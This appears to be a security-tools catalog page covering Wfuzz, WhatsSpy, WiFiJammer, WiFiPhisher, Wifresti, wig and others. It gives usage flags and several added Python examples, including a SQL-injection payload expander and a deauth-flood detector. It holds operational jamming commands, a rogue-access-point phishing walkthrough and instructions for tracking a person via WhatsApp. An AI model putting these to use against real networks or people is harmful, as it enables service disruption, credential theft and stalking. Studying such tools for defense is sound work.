    Wfuzz is a tool designed for bruteforcing web applications. It can be used for finding resources that are not linked (directories, servlets, scripts, etc.), bruteforcing GET and POST parameters to check for different kinds of injection (SQL, XSS, LDAP, etc.), bruteforcing form parameters (user/password), fuzzing, etc.

    Some features
    • Multiple Injection points capability with multiple dictionaries
    • Recursion (When doing directory bruteforce)
    • Post, headers and authentication data brute forcing
    • Output to HTML
    • Colored output
    • Hide results by return code, word numbers, line numbers, regex.
    • Cookies fuzzing
    • Multi threading
    • Proxy support
    • SOCKS support
    • Time delays between requests
    • Authentication support (NTLM, Basic)
    • All parameters bruteforcing (POST and GET)
    • Multiple encoders per payload
    • Payload combinations with iterators
    • Baseline request (to filter results against)
    • Brute force HTTP methods
    • Multiple proxy support (each request through a different proxy)
    • HEAD scan (faster for resource discovery)
    • Dictionaries tailored for known applications (Weblogic, Iplanet, Tomcat, Domino, Oracle 9i, Vignette, Coldfusion and many more). Many dictionaries are from Darkraver's Dirb, www.open-labs.org.

    Payloads
    • File
    • List
    • hexrand
    • range
    • names
    • hexrange

    Encodings
    • random_uppercase
    • urlencode
    • binary_ascii
    • base64
    • double_nibble_hex
    • uri_hex
    • sha1
    • md5
    • double_urlencode
    • utf8
    • utf8_binary
    • html
    • html decimal
    • custom
    • many more...

    Iterators
    • Product
    • Zip
    • Chain
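    Payloads, encoders and iterators combine as follows: each injection marker in the request template (wfuzz uses FUZZ, FUZ2Z, ... as markers) is bound to one payload source, each source has an encoder chain, and the iterator decides how the sources are combined. The following added example (not wfuzz's own code) implements that combination with the standard library; the encoder implementations are this example's reading of the names listed above, not wfuzz's exact code, and the target URL and payload lists are constructed.

```python
import base64
import hashlib
import itertools
from urllib.parse import quote

# A few of the encoders listed above, each mapping str -> str.
# These are this example's implementations; consult wfuzz for its own behaviour.
ENCODERS = {
    "urlencode": lambda s: quote(s, safe=""),
    "double_urlencode": lambda s: quote(quote(s, safe=""), safe=""),
    "base64": lambda s: base64.b64encode(s.encode()).decode(),
    "md5": lambda s: hashlib.md5(s.encode()).hexdigest(),
    "sha1": lambda s: hashlib.sha1(s.encode()).hexdigest(),
    "uri_hex": lambda s: "".join(f"%{b:02x}" for b in s.encode()),
}


def encode(value, chain):
    """Apply an encoder chain left to right, e.g. ["urlencode", "md5"]."""
    for name in chain:
        value = ENCODERS[name](value)
    return value


def marker(i):
    """Marker for the i-th payload: FUZZ, FUZ2Z, FUZ3Z, ..."""
    return "FUZZ" if i == 0 else f"FUZ{i + 1}Z"


def expand(template, payloads, iterator="product"):
    """payloads: list of (values, encoder_chain), one per marker in order.
    Returns the concrete request strings produced by the chosen iterator."""
    columns = [[encode(v, chain) for v in values] for values, chain in payloads]
    if iterator == "product":
        combos = itertools.product(*columns)          # every combination
    elif iterator == "zip":
        combos = zip(*columns)                        # positional pairs, stops at the shortest list
    elif iterator == "chain":
        # one marker, dictionaries played back to back
        combos = ((v,) for v in itertools.chain.from_iterable(columns))
    else:
        raise ValueError(f"unknown iterator {iterator!r}")
    out = []
    for combo in combos:
        s = template
        for i, v in enumerate(combo):
            s = s.replace(marker(i), v)
        out.append(s)
    return out


if __name__ == "__main__":
    # Constructed: usernames from one list, injection strings from another, URL-encoded.
    requests = expand(
        "http://target/login?user=FUZZ&pass=FUZ2Z",
        [(["admin", "root"], []), (["1' OR '1'='1", "x"], ["urlencode"])],
        iterator="product",
    )
    for r in requests:
        print(r)
```

    With product, two lists of n and m entries give n*m requests, which is why the baseline request and the hide-by-code/words/lines filters matter: the interesting responses are the handful that differ from the rest.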

    Download Wfuzz

    WhatsSpy - Trace the moves of a WhatsApp user


    WhatsSpy Public is a web-oriented application that tracks every move of whoever you like to follow. It was set up as a proof of concept that WhatsApp is broken in terms of privacy. Once you've set up this application you can track the WhatsApp users you want to follow. While it's running it keeps track of the following activities:
    • Online/Offline status (even with privacy options set to "nobody")
    • Profile pictures
    • Privacy settings
    • Status messages
    I made this project to make you realise how broken the privacy options actually are. It started out as experimenting with WhatsApp to build a bot, but I was stunned when I realised someone could abuse this "online" feature of WhatsApp to track anyone. I could just say in a blog article (as I tried, but it got marked as spam) that the privacy options are broken, but you wouldn't realise the impact it actually has.

    Requirements

    Shortlist requirements:
    • Secondary Whatsapp account (phonenumber that doesn't use Whatsapp)
    • Rooted Android phone OR Jailbroken iPhone OR PHP knowledge
    • Server/RPi that runs 24/7
    • Nginx or Apache with PHP and PDO (php5-pgsql installed); you can't host this on a simple web hoster, you need a shell (bash)
    • Postgresql

    Notice

    WhatsSpy Public requires a secondary WhatsApp account. Once the tracker is started, you will not be able to receive any messages over WhatsApp for this phone number. You can either try to register a phone number not yet used with WhatsApp with, for example, this script, or just buy a 5 euro SIM card and use that phone number for the tracker.

    For the tracker to work you need a secret, which is retrieved from either your phone or the register script mentioned above. In the case of phone registration you need a jailbroken iPhone or rooted Android device in order to retrieve the secret.
    • Jailbroken iPhone users: You can retrieve using this script.
    • Rooted Android phones can use the following APK to retrieve the secret.
    In order to retrieve the secret you need to follow these steps:
    • Insert your (new) secondary SIM card in your phone and boot it up.
    • Re-install Whatsapp on your phone and activate it using the new phonenumber.
    • Use either the APK (Android) or the script (iPhone) to retrieve the WhatsApp secret. Write this secret down, which is required later.
    • Insert your normal SIM card and re-install WhatsApp for normal use.


    Download WhatsSpy

    Whonix v11 - Anonymous Operating System


    Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP.

    Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

    Whonix for Qubes
    https://www.whonix.org/wiki/Qubes

    Whonix for KVM
    https://www.whonix.org/wiki/KVM

    Whonix for VirtualBox
    https://www.whonix.org/wiki/VirtualBox

    If you want to upgrade existing Whonix version using Whonix’s APT repository
    Special instructions required:
    https://www.whonix.org/wiki/Upgrading_Whonix_10_to_Whonix_11

    Changelog between Whonix 10.0.0.5.5 and Whonix 11.0.0.2.3:

    – fixed custom workstation build
    – build script: refactoring, use errtrace rather than many traps – https://phabricator.whonix.org/T48
    – build script: refactoring, use exit trap to reduce code duplication – https://phabricator.whonix.org/T269
    – whonixcheck: warn if whonix-gateway / whonix-workstation package is not installed – https://phabricator.whonix.org/T264
    – whonixcheck: warn if there is low entropy – https://phabricator.whonix.org/T202
    – build, anon-apt-sources-list, anon-shared-build-apt-sources-tpo, whonix-repository: changed release codename from wheezy to jessie – https://phabricator.whonix.org/T270
    – grub-enable-apparmor: Refactoring. Simplified for Debian jessie. Thanks to the new `/etc/default/grub.d` configuration folder, the `grub-enable-apparmor` has been greatly simplified. No longer need to config-package-dev divert `/etc/default/grub`.
    – genmkfile: if debuild not available, recommend installation of the devscripts package
    – build script: added fakeroot to whonix_build_script_build_dependency (required for verifiable builds)
    – genmkfile: fix, do not set automatically make_use_gain_root_command to true if fakeroot is not installed
    – genmkfile: run dpkg-checkbuilddeps before lintian to show better hint if build dependencies are missing
    – build script: build-steps.d/1200_create-debian-packages: commented out get_extra_packages, no longer need to download packages from testing
    – build script: refactoring, created separate help step, help-steps/git_sanity_test
    – whonixcheck: verbose output for check_tor_socks_port_reachability
    – all packages: packaging, bumped Standards-Version from 3.9.4 to 3.9.6 for jessie support
    – lintian warning copyright fix
    – tb-updater: show “highest version number is not necessarily the best one” message also on first run if no Tor Browser is installed yet – https://phabricator.whonix.org/T283
    – build script: No longer install acpi-support-base by default on jessie, because systemd now implements that functionality. – https://phabricator.whonix.org/T284
    – whonixcheck: added link to Whonix Build Version documentation https://www.whonix.org/wiki/Whonixcheck#Whonix_Build_Version – https://phabricator.whonix.org/T276
    – build script: Fix commit 287bdcf6ddee007ba579e3ee9a1997edc8188581 ‘makefile: added --pedantic to default DEBUILD_LINTIAN_OPTS because we are going to fix the last remaining “missing upstream changelog” warning’ – added --pedantic to help-steps/variables.
    – all packages: added debian/source/lintian-overrides with debian-watch-may-check-gpg-signature to fix lintian warning – https://phabricator.whonix.org/T277
    – whonix-setup-wizard, anon-gw-anonyminizer-config, whonixcheck, whonix-ws-start-menu-additions, whonix-host-firewall: added ‘Keywords=’ to ‘.desktop’ files to fix lintian warning ‘desktop-entry-lacks-keywords-entry’ – https://phabricator.whonix.org/T281
    – anon-shared-helper scripts: replaced dependency ‘python-support (>= 0.90)’ with dh-python to fix lintian warning
    – control-port-filter-python: packaging, use debhelper with python2 to fix lintian warning
    – modify apt-get parameters during build to prevent need to remove apt-listchanges – https://phabricator.whonix.org/T282
    – build-script: refactoring, moved variables DEBIAN_FRONTEND DEBIAN_PRIORITY DEBCONF_NOWARNINGS APT_LISTCHANGES_FRONTEND from help-steps/variables to buildconfig.d/30_apt_opts
    – genmkfile: hint “Is the build dependency genmkfile installed?” if genmkfile is not installed
    – genmkfile: hint ‘dpkg-parsechangelog not found. Do you have the “build-essential” package installed?’ if dpkg-parsechangelog is not available
    – sdwdate: removed dependency on ruby1.9.1-dev to fix lintian warning ‘E: sdwdate: depends-on-obsolete-package depends: ruby1.9.1-dev’
    – whonixcheck: show diagnostic message on whonixcheck Whonix News gpg verification failure by default
    – build script: Fix building Whonix on Whonix, fix if `lsb_release --short --i` returns ‘Whonix’. Temp hack ‘export whonix_build_on_operating_system=”debian”’ no longer required. Thanks to @nrgaway for the bug report and the analysis. – https://phabricator.whonix.org/T278
    – tb-updater: tbbversion_installed parser fix
    – anon-meta-packages: removed dependency on libupower-glib1 which is no longer available in Debian jessie (which has been replaced by upower, that already gets installed)
    – anon-base-files, whonix-developer-meta-files: implemented WHONIX_BUILD_QUBES=true environment variable support – https://phabricator.whonix.org/T298
    – anon-meta-packages: whonix-gateway and whonix-workstation package no longer depend on anon-shared-build-fix-grub because it has been made a weak dependency for better physical isolation and Qubes support
    – code simplification, removed support for environment variable ANON_BUILD_INSTALL_TO_ROOT=true because anon-shared-build-fix-grub now gets only installed on required platforms
    – implemented build parameter ‘--unsafe-io true’, which speeds up builds: it uses ‘-o Dpkg::Options::=--force-unsafe-io’ and eatmydata, and ignores ‘sync’. – Thanks to @nrgaway for the suggestion! – https://phabricator.whonix.org/T295
    – implemented $apt_misc_opts – https://phabricator.whonix.org/T295
    – whonixcheck: new --verbose debug feature, showing output of systemd-detect-virt
    – vbox-disable-timesync: more robust implementation that is compatible with systemd – https://phabricator.whonix.org/T106
    – timesync: compatibility with systemd – https://phabricator.whonix.org/T106
    – whonixcheck, msgdispatcher: ported to systemd – https://phabricator.whonix.org/T106
    – qubes-whonix: skip rads on Qubes – https://phabricator.whonix.org/T306
    – systemd unit files: workaround/fix, removed spaces from ‘WantedBy = ‘, likely bug in ‘deb-systemd-helper’ that prevents enabling the service by default – https://phabricator.whonix.org/T316
    – created a hellodaemon package, useful for Debian systemd packaging debugging – not part of Whonix – https://github.com/adrelanos/hellodaemon
    – whonixcheck: debian/control: fix, added to ‘Build-Depends:’ ‘ruby-ronn (>= 0.7.3)’
    – disable torsocks warning spam – https://phabricator.whonix.org/T317
    – whonix-libvirt: fixed CI builds
    – whonix-libvirt: added driver name=’qemu’ – Thanks to HulaHoop! – https://github.com/Whonix/whonix-libvirt/pull/20 https://github.com/Whonix/whonix-libvirt/pull/19 https://github.com/Whonix/whonix-libvirt/pull/18
    – anon-meta-packages: added obfs4proxy to anon-gateway-packages-recommended – https://phabricator.whonix.org/T323
    – anon-meta-packages: added apt-transport-tor to anon-shared-packages-recommended – https://phabricator.whonix.org/T92
    – whonix-gw-network-conf, whonix-ws-network-conf: Removed ‘pre-up /usr/bin/whonix_firewall’ from /etc/network/interfaces, because the firewall is now loaded from /etc/network/if-pre-up.d (see the next entry). – https://phabricator.whonix.org/T68
    – whonix-gw-firewall, whonix-ws-firewall, whonix-host-firewall: Made the packages more standalone. Requiring ‘pre-up /usr/bin/whonix_firewall’ in /etc/network/interfaces is no longer necessary. Added etc/network/if-pre-up.d/30_whonix_firewall to load the firewall; this became possible because the Debian upstream bug ‘interface comes up even if a script in /etc/network/if-pre-up.d/ fails’ http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. – https://phabricator.whonix.org/T68
    – whonixsetup, whonix-setup-wizard: fix ‘Tor fails after reload related to torrc DisableNetwork setting issue’ by only restarting Tor, no longer trying to reload Tor – https://phabricator.whonix.org/T320
    – rads: Improved implementation. When there is enough RAM… On ‘enter’: instantly start login manager. On ‘ctrl + c’: instantly abort and do not start login manager. On ‘timeout’: start login manager. Thanks to ‘dh_systemd_start –no-start’ we can now use ‘StandardInput=tty’ and ‘read’ instead of ‘systemd-ask-password’. Now we could even implement an interactive menu at boot (that allows to configure wait time and/or disabling rads). – https://phabricator.whonix.org/T57
    – whonixcheck: abolished random wait by default – https://phabricator.whonix.org/T299
    – anon-ws-disable-stacked-tor: fixed ‘insserv: script tor.anondist-orig: service tor already provided!’ warning during upgrades – https://phabricator.whonix.org/T303
    – anon-ws-disable-stacked-tor: systemd compatibility – https://phabricator.whonix.org/T303
    – anon-base-files: no longer ‘set -o pipefail’ in /usr/lib/pre.bsh. config-package-dev doesn’t like ‘set -o pipefail’ – http://mailman.mit.edu/pipermail/config-package-dev/2015-May/000041.html – https://phabricator.whonix.org/T329
    – upstream bug report: spaces in Tor’s systemd unit file causes issues – https://trac.torproject.org/projects/tor/ticket/16162
    – upstream bug report: Tor dies on reload when swichting to ‘DisableNetwork 0’ when using ‘DnsPort 127.0.0.1:53’ – https://trac.torproject.org/projects/tor/ticket/16161
    – build script: fix, support ‘--verifiable false’ (was ‘--verifiable minimal’ while the build documentation said ‘false’)
    – uwt: multi user fix – https://www.whonix.org/forum/index.php/topic,1267
    – Qubes: WiFi Realtek RTL8191SEvB Issue and Solution – https://groups.google.com/forum/#!topic/qubes-users/kMGTSwP72aU
    – whonix-setup-wizard API proposal: https://www.whonix.org/wiki/Dev/whonixsetup


    Download Whonix v11

    WifiInfoView v1.79 - WiFi Scanner for Windows 7/8/Vista


    WifiInfoView scans the wireless networks in your area and displays extensive information about them, including: Network Name (SSID), MAC Address, PHY Type (802.11g or 802.11n), RSSI, Signal Quality, Frequency, Channel Number, Maximum Speed, Company Name, Router Model and Router Name (only for routers that provide this information), and more...

    When you select a wireless network in the upper pane of this tool, the lower pane displays the Wi-Fi information elements received from this device, in hexadecimal format.

    WifiInfoView also has a summary mode, which displays a summary of all detected wireless networks, grouped by channel number, company that manufactured the router, PHY type, or the maximum speed.

    Columns In the Upper Pane
    • SSID: The name of the network.
    • MAC Address: MAC address of the router.
    • PHY Type: The PHY type for this network - 802.11a, 802.11g, 802.11n, or High-Rate DSSS
    • RSSI: The received signal strength indicator value, in units of decibels referenced to 1.0 milliwatts (dBm), as detected by the wireless LAN interface driver for the AP or peer station.
    • Signal Quality: A number between 0 and 100 that represents the quality of the signal.
    • Frequency: The channel center frequency of the band on which the 802.11 Beacon or Probe Response frame was received. The value of this column is in units of Gigahertz (GHz).
    • Channel: Channel number used by this wireless network.
    • Information Size: The total size (in bytes) of all Wi-Fi information elements received from this wireless network.
    • Elements Count: The total number of Wi-Fi information elements received from this wireless network.
    • Company: The company that manufactured the router, according to the 3 first bytes of the MAC address.
    • Router Model: The model of the router. This value is displayed only for routers that provide this information inside the Wi-Fi information elements.
    • Router Name: The name of the router. This value is displayed only for routers that provide this information inside the Wi-Fi information elements.
    • Security: Specifies whether the network is secured (Yes/No).
    • Maximum Speed: The maximum speed (in Mbps) that you can get when connecting to this wireless network.
    • First Detection: The first date/time that this network was detected.
    • Last Detection: The last date/time that this network was detected.
    • Detection Count: The number of times that this network was detected.  

    Command-Line Options

    /cfg <Filename> Start WifiInfoView with the specified configuration file. For example:
    WifiInfoView.exe /cfg "c:\config\csv.cfg"
    WifiInfoView.exe /cfg "%AppData%\WifiInfoView.cfg"
    /NumberOfScans <Number> Specifies the number of scans to perform when using the save command-line options (/scomma, /shtml, and so on...)
    /stext <Filename> Save the list of wireless networks into a regular text file.
    /stab <Filename> Save the list of wireless networks into a tab-delimited text file.
    /scomma <Filename> Save the list of wireless networks into a comma-delimited text file (csv).
    /stabular <Filename> Save the list of wireless networks into a tabular text file.
    /shtml <Filename> Save the list of wireless networks into HTML file (Horizontal).
    /sverhtml <Filename> Save the list of wireless networks into HTML file (Vertical).
    /sxml <Filename> Save the list of wireless networks into XML file.
    /sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "SSID" and "RSSI". You can specify the '~' prefix character (e.g: "~SSID") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
    WifiInfoView.exe /shtml "d:\temp\wifi.html" /sort 2 /sort ~1
    WifiInfoView.exe /scomma "d:\temp\wifi.html" /sort "~Security" /sort "SSID"
    /nosort When you specify this command-line option, the list will be saved without any sorting.
    /UseOnlyAdapter <0 | 1> Specifies whether to use only the desired network adapter. 0 = No, 1 = Yes.
    /NetworkAdapter <Adapter Guid> Specifies the guid of the network adapter to use, for example:
    WifiInfoView.exe /UseOnlyAdapter 1 /NetworkAdapter "{F261051F-D217-12D0-B9A9-F61D323AD21E}"
    /SortOnEveryUpdate <0 | 1> Specifies whether to sort on every update. 0 = No, 1 = Yes.
    /MacAddressFormat <1 - 3> Specifies the MAC address format. 1 = XX-XX-XX-XX-XX-XX, 2 = XX:XX:XX:XX:XX:XX, 3 = XXXXXXXXXXXX.
    /DisplayMode <1 - 11> Specifies the display mode:
    1 - Full Details Mode
    2 - Channels Summary Mode
    3 - Companies Summary Mode
    4 - PHY Types Summary Mode
    5 - Max Speed Summary Mode
    6 - Router Model Summary Mode
    7 - Router Name Summary Mode
    8 - Signal Quality Summary Mode
    9 - BSS Type Summary Mode
    10 - Security Summary Mode
    11 - WPS Summary Mode
    /UpdateRate <1 - 4> Specifies the update rate: 1- Low, 2 - Medium, 3 - High, 4 - Very High.


    Download WifiInfoView v1.79

    WiFiJammer - Continuously Jam All WiFi Clients/Routers


    Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block radius with heavy access point saturation. Granularity is given in the options for more effective targeting.

    Requires: python 2.7, python-scapy, a wireless card capable of injection

    Usage

    Simple
    python wifijammer.py
    This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11 identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through.

    Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses.
    python wifijammer.py -a 00:0E:DA:DE:24:8E -c 2
    Deauthenticate all devices with which 00:0E:DA:DE:24:8E communicates, skipping channel hopping by setting the channel to the target AP's channel (2 in this case). This would mainly be an access point's MAC, so all clients associated with that AP would be deauthenticated, but you can also put a client MAC here to target that one client and any other devices that communicate with it.

    Advanced
    python wifijammer.py -c 1 -p 5 -t .00001 -s DL:3D:8D:JJ:39:52 -d --world
    -c, Set the monitor mode interface to only listen and deauth clients or APs on channel 1
    -p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP
    -t, Set a time interval of .00001 seconds between sending each deauth (try this if you get a scapy error like 'no buffer space')
    -s, Do not deauth the MAC DL:3D:8D:JJ:39:52. Ignoring a certain MAC address is handy in case you want to tempt people to join your access point in cases of wanting to use LANs.py or a Pineapple on them.
    -d, Do not send deauths to access points' broadcast address; this will speed up the deauths to the clients that are found
    --world, Set the max channel to 13. In N. America the max channel standard is 11, but the rest of the world uses 13 channels so use this option if you're not in N. America

    Walking/driving around
    python wifijammer.py -m 10
    The -m option sets a max number of client/AP combos that the script will attempt to deauth. When the max number is reached, it clears and repopulates its list based on what traffic it sniffs in the area. This allows you to constantly update the deauth list with client/AP combos who have the strongest signal in case you were not stationary. If you want to set a max and not have the deauth list clear itself when the max is hit, just add the -n option like: -m 10 -n

    All options:
    python wifijammer.py [-a AP MAC] [-c CHANNEL] [-d] [-i INTERFACE] [-m MAXIMUM] [-n] [-p PACKETS] [-s SKIP] [-t TIME INTERVAL]
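    The three-frame pattern described above (AP to client, client to AP, AP to broadcast) is sent with spoofed source addresses, so the sender field of a deauthentication frame tells a defender nothing about who really sent it. What does distinguish a jammer from an access point is rate: a real AP sends a handful of deauths in a day, a jammer sends bursts to every station it has seen. The following added example (not part of wifijammer) shows that check as a sliding-window counter over deauthentication frames; the frame records are constructed, and in practice they would come from a monitor-mode capture filtered to management frames of subtype deauthentication.

```python
from collections import defaultdict, deque


def deauth_floods(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_seconds, sender_mac, receiver_mac) for
    deauthentication frames, in time order.

    Returns {sender_mac: timestamp at which more than `threshold` deauths from
    that sender were seen within `window` seconds}. Sender is the (possibly
    spoofed) address in the frame, so an alert names the BSSID being abused,
    not the attacker's real card."""
    recent = defaultdict(deque)   # sender -> timestamps inside the window
    alerts = {}
    for t, src, dst in frames:
        q = recent[src]
        q.append(t)
        while q and t - q[0] > window:
            q.popleft()
        if len(q) > threshold and src not in alerts:
            alerts[src] = t
    return alerts


def constructed_capture():
    """Constructed sample: a legitimate AP sends two deauths five seconds apart,
    then a jammer spoofing that BSSID sprays the three-frame pattern six times
    within about 10 ms (AP->client, client->AP, AP->broadcast)."""
    ap, client, bcast = "00:0e:da:de:24:8e", "ac:de:48:00:11:22", "ff:ff:ff:ff:ff:ff"
    frames = [(0.0, ap, client), (5.0, ap, client)]
    for i in range(6):
        t = 10.0 + i * 0.002
        frames += [(t, ap, client), (t, client, ap), (t, ap, bcast)]
    return frames


if __name__ == "__main__":
    for bssid, when in deauth_floods(constructed_capture()).items():
        print(f"deauth flood from {bssid} detected at t={when:.3f}s")
```

    Tune window and threshold to the environment (enterprise controllers do send more deauths during load balancing), and correlate with the RSSI and sequence-number discontinuities of the offending frames to tell the spoofed copies from the real AP's own traffic.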


    Download WiFiJammer

    WiFiPhisher - Fast automated phishing attacks against WiFi networks


    Wifiphisher is a security tool that mounts fast automated phishing attacks against WiFi networks in order to obtain secret passphrases and other credentials. It is a social engineering attack that, unlike other methods, does not involve any brute forcing. It is an easy way of obtaining credentials from captive portals and third-party login pages, or WPA/WPA2 passphrases.

    Wifiphisher works on Kali Linux and is licensed under the MIT license.

    From the victim's perspective, the attack proceeds in three phases:
    1. The victim is deauthenticated from their access point. Wifiphisher continuously jams all of the target access point's WiFi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
    2. The victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
    3. The victim is served a realistic-looking router configuration page. Wifiphisher employs a minimal web server that responds to HTTP and HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials, for example one that asks for WPA password confirmation due to a router firmware upgrade.

    Usage
    Short form  Long form          Explanation
    -m          maximum            Choose the maximum number of clients to deauth. The list of clients will be emptied and repopulated after hitting the limit. Example: -m 5
    -n          noupdate           Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
    -t          timeinterval       Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001
    -p          packets            Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2
    -d          directedonly       Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs
    -a          accesspoint        Enter the MAC address of a specific access point to target
    -jI         jamminginterface   Choose the interface for jamming. By default the script will find the most powerful interface and start monitor mode on it.
    -aI         apinterface        Choose the interface for the fake AP. By default the script will find the second most powerful interface and start monitor mode on it.

    Screenshots

    Targeting an access point

    A successful attack

    Fake router configuration page


    Requirements
    • Kali Linux.
    • Two wireless network interfaces, one capable of injection.

    Download WiFiPhisher

    Wifresti - Find your wireless network password from Windows, Linux and Mac OS


    Find your wireless network password from Windows, Linux and Mac OS.

    Wifresti is a simple Wi-Fi password recovery tool, compatible with Windows and Unix systems (Linux, Mac OS).

    Features
    • Recover Wifi password on Windows
    • Recover Wifi password on Unix

    Requirements
    • An operating system (tested on Ubuntu, Windows 10,8,7)
    • Python 2.7

    Installation
    sudo su
    git clone https://github.com/LionSec/wifresti.git && cp wifresti/wifresti.py /usr/bin/wifresti && chmod +x /usr/bin/wifresti
    sudo wifresti


    Download Wifresti

    wig - WebApp Information Gatherer


    wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.
    The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.
    wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.

    wig features:
    • CMS version detection by: checksums, string matching and extraction
    • Lists detected package and platform versions such as asp.net, php, openssl, apache
    • Detects JavaScript libraries
    • Operating system fingerprinting by matching php, apache and other packages against values in wig's database
    • Checks for files of interest such as administrative login pages, readmes, etc
    • wig's databases currently include 28,000 fingerprints
    • Reuse information from previous runs (save the cache)
    • Implement a verbose option
    • Remove dependency on 'requests'
    • Support for proxy
    • Proper threading support
    • Included check for known vulnerabilities

    Requirements

    wig is built with Python 3, and is therefore not compatible with Python 2.

    How it works

    The default behavior of wig is to identify a CMS, and exit after version detection of the CMS. This is done to limit the amount of traffic sent to the target server. This behavior can be overridden by setting the '-a' flag, in which case wig will test all the known fingerprints. As some configurations of applications do not use the default location for files and resources, it is possible to have wig fetch all the static resources it encounters during its scan. This is done with the '-c' option. The '-m' option tests all fingerprints against all fetched URLs, which is helpful if the default location has been changed.
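    The checksum-and-weight scoring the description above sketches (hits on known files, shared files counting less, ties reported as "7.31 | 7.32 | 7.33") can be illustrated in a few lines. The block below is an added example written for this page; it is not wig's own code or database. The file paths, file bodies, version labels and the fetched responses are all constructed for the example, and the 1/len(versions) weighting is this example's own choice, not necessarily the weights wig uses.

```python
import hashlib


def md5_hex(data: bytes) -> str:
    """Checksum used to match a fetched file against the fingerprint database."""
    return hashlib.md5(data).hexdigest()


# Constructed fingerprint database: path -> {checksum: [versions that ship that exact file]}.
# Paths, file bodies and version labels are invented for this example; this is not wig's data.
KNOWN_FILES = {
    "/misc/drupal.js": {
        md5_hex(b"// constructed drupal.js body for 7.31\n"): ["7.31"],
        md5_hex(b"// constructed drupal.js body for 7.32\n"): ["7.32"],
    },
    "/CHANGELOG.txt": {
        md5_hex(b"Drupal 7.32, constructed changelog\n"): ["7.32"],
    },
    # A file that did not change across several releases: a hit on it is
    # evidence for all of them, so it gets proportionally less weight.
    "/modules/system/system.css": {
        md5_hex(b"body { margin: 0; } /* constructed */\n"): ["7.31", "7.32", "7.33"],
    },
}


def score_versions(fetched, known_files=KNOWN_FILES):
    """fetched: {path: response body bytes}. Returns {version: score}.

    Each checksum hit adds 1/len(versions) to every version that ships that
    exact file, so unique files count fully and shared files count fractionally.
    """
    scores = {}
    for path, body in fetched.items():
        candidates = known_files.get(path)
        if not candidates:
            continue  # path is not fingerprinted at all
        versions = candidates.get(md5_hex(body))
        if not versions:
            continue  # known path, but the content matches no known release
        weight = 1.0 / len(versions)
        for version in versions:
            scores[version] = scores.get(version, 0.0) + weight
    return scores


def most_probable(scores):
    """Versions sharing the top score, sorted; several entries mean a tie such as '7.31 | 7.32 | 7.33'."""
    if not scores:
        return []
    best = max(scores.values())
    return sorted(v for v, s in scores.items() if s == best)


# Constructed responses standing in for what a scanner would fetch from a site.
SAMPLE_RESPONSES_FULL = {
    "/misc/drupal.js": b"// constructed drupal.js body for 7.32\n",
    "/CHANGELOG.txt": b"Drupal 7.32, constructed changelog\n",
    "/modules/system/system.css": b"body { margin: 0; } /* constructed */\n",
    "/robots.txt": b"User-agent: *\n",
}

# Only the shared stylesheet was reachable, so the best the scorer can do is a tie.
SAMPLE_RESPONSES_AMBIGUOUS = {
    "/modules/system/system.css": b"body { margin: 0; } /* constructed */\n",
}


if __name__ == "__main__":
    for name, responses in (("full", SAMPLE_RESPONSES_FULL),
                            ("ambiguous", SAMPLE_RESPONSES_AMBIGUOUS)):
        scores = score_versions(responses)
        print(name, scores, "->", " | ".join(most_probable(scores)))
```

    The ambiguous case is the one to notice when reading scanner output: a range such as "7.28 | 7.29 | 7.30" in the wig example below means the reachable files are identical across those releases, not that the scanner found three versions.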

    Help Screen
    usage: wig.py [-h] [-l INPUT_FILE] [-n STOP_AFTER] [-a] [-m] [-u]
                  [--no_cache_load] [--no_cache_save] [-N] [--verbosity]
                  [--proxy PROXY] [-w OUTPUT_FILE]
                  [url]
    
    WebApp Information Gatherer
    
    positional arguments:
      url              The url to scan e.g. http://example.com
    
    optional arguments:
      -h, --help       show this help message and exit
      -l INPUT_FILE    File with urls, one per line.
      -n STOP_AFTER    Stop after this amount of CMSs have been detected. Default:
                       1
      -a               Do not stop after the first CMS is detected
      -m               Try harder to find a match without making more requests
      -u               User-agent to use in the requests
      --no_cache_load  Do not load cached responses
      --no_cache_save  Do not save the cache for later use
      -N               Shortcut for --no_cache_load and --no_cache_save
